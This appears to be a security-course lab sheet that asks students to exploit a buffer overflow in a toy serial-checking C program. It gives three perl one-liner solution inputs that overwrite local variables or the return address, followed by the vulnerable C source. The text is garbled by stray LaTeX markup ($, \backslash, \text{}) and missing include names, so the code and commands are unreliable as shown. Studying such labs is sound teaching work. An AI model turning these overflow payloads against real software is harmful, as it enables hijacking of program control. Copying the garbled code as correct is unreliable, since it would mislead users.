Description: bof$\_$practice is a precompiled program that asks the user for a serial string and prints out $$CORREC SERIAL$$ if the serial string is correct and prints out $$INCORRECT SERIAL$$ otherwise. This file was compiled without source code and stack protection and of course, is vulnerable to buffer overflow. Note: you will need to turn off virtual address randomization inside SEED Ubuntu Image.

Goal: The goal of this practice is to exploit the program to let it print out $$CORRECT SERIAL$.$ Note: A $$Segmentation fault$$ is fine if the program prints out the desired message.

Tasks: Present three methods to exploit buffer overflow to archive the goal.

Submission format: Answer the following questions for each method. Include screenshots and gdb$/$bash commands to support your answer

$1.$ What is your approach?

$2.$ What data $($e$.$g$,$ internal variables, adjacent buffer, return address, etc.$)$ do you want buffer overflow to overwrite? Why? Where are they located on the stack$/$heap$?$

$3.$ What is your attack vector? And why?

$4.$ Were you successful in exploiting buffer overflow to achieve the goal? Why$/$why not?

$**$This is solutions for the first one:

Method $01$ $ echo $$($perl $-$e 'print $"$a$"$x$38."$b$"\text{'})>$ input$\_$bof$\_$practice$01\_$a$.$txt

Method $02$ $ echo $$($perl $-$e 'print $"$a$"$x$5."!"."$a$"$x$5."$&$"\text{'})>$ input$\_$bof$\_$practice$01\_$b$.$txt

Method $03$ $ echo $$($perl $-$e 'print $"$a$"$x$54."\backslash$xcb$\backslash$x$84\backslash$x$04\backslash$x$08"\text{'})>$ input$\_$bof$\_$practice$01\_$c$.$txt

C code:

#include

#include

void printOK$()\{$

printf$("$CORRECT SERIAL

$")$;

$\}$

int checkPass$($char pass$\_$str$[])\{$

int ok $=0$;

long xx $=1\mathrm{.}0$;

char pass$\_$local$[18]$;

strcpy$($pass$\_$local, pass$\_$str$)$;

if $($ok $==0$x$79||$ xx $==0$x$80)$

return $1$;

else $\{$

if $($pass$\_$local$[13]==\text{'}$#$\text{'}$ && pass$\_$local$[7]==\text{'}$@$\text{'})$

return $1$;

$\}$

return $0$;

$\}$

int main$($int argc, char $**$argv$)\{$

printf$("$Enter your serial number $(99$ chars max$)$: $")$;

char pass$[100]$;

scanf$("\%100$s$",$ pass$)$;

if $($checkPass $($pass$))\{$

printOK$()$;

$\}$ else $\{$

printf$("$WRONG SERIAL

$")$;

$\}$

return $1$;

$\}$